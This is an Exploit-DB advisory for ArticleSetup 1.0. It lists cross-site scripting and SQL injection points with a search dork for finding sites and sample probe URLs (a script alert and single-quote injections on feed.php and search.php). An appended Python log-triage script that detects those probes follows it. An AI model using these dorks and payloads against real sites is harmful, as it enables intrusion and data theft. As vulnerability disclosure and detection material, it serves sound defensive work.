- 18 Dec 2022
- EDB-ID
- 28564
- EDB Verified
- Passed
- Author
- DEVILSCREAM
- Vulnerability type
- WEBAPPS
- Platform
- PHP
- CVE
- null
- Publication date
- 2013-09-26
Code:
#Exploit Title : ArticleSetup Multiple Vulnerabilities
#Author : DevilScreaM
#Date : 21/09/2013
#Category : Web Applications
#Vendor : http://www.articlesetup.com/
#Version : 1.0
#Dork
intext:Powered By Article Marketing
#Vulnerability : Cross Site Scripting , SQL Injection
#Tested On : Windows 7, Ubuntu (Mozilla & Chrome)
#Greetz : Newbie-Security.or.id, Banjarmasin Hacker, Borneo Hacker
Cross Site Scripting
http://site-target/search.php?s=[XSS]
#XSS at Page Admin
http://site-target/admin/search.php?s=<script>alert('DevilScreaM')</script>
===================================================================================
SQL Injection Vulnerability
http://site-target/feed.php?cat=[SQL Injection]
http://site-target/search.php?s=[SQL Injection]
Example
http://site-target/feed.php?cat=100'
http://site-target/search.php?s=123'
====================================================================================
- Source
- www.exploit-db.com
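
Added example (not part of the original advisory and not ArticleSetup code): a log triage script for defenders that flags requests to the `s` parameter of search.php and the `cat` parameter of feed.php, the parameters named above, when the decoded value contains a single quote or script markup. The combined access-log format, the numeric-only rule for `cat` and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Script suffix -> parameter from the advisory; /search.php also matches /admin/search.php.
WATCHED = {"/search.php": "s", "/feed.php": "cat"}

# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(param, value):
    """Return the reasons a decoded parameter value looks like a probe."""
    reasons = []
    if "'" in value:
        reasons.append("quote")
    if re.search(r"<\s*script", value, re.IGNORECASE):
        reasons.append("script-markup")
    # Assumption: cat is a numeric category id (the advisory uses cat=100).
    if param == "cat" and not re.fullmatch(r"[0-9]+", value):
        reasons.append("non-numeric-cat")
    return reasons

def scan(lines):
    """Return [(line_no, path, param, reasons)] for suspicious requests."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path, _, query = match.group(1).partition("?")
        param = next((p for sfx, p in WATCHED.items() if path.endswith(sfx)), None)
        if param is None:
            continue
        # parse_qs percent-decodes, so %27 and %3Cscript%3E are caught too.
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            reasons = classify(param, value)
            if reasons:
                hits.append((line_no, path, param, reasons))
    return hits

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [26/Sep/2013:10:00:01 +0000] "GET /search.php?s=php+tutorial HTTP/1.1" 200 5120',
    '192.0.2.44 - - [26/Sep/2013:10:00:05 +0000] "GET /feed.php?cat=100%27 HTTP/1.1" 200 312',
    '192.0.2.44 - - [26/Sep/2013:10:00:09 +0000] "GET /admin/search.php?s=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2048',
    '192.0.2.10 - - [26/Sep/2013:10:00:12 +0000] "GET /feed.php?cat=7 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

A quote in `s` can come from an ordinary search term containing an apostrophe, so hits are leads to review rather than confirmed attacks.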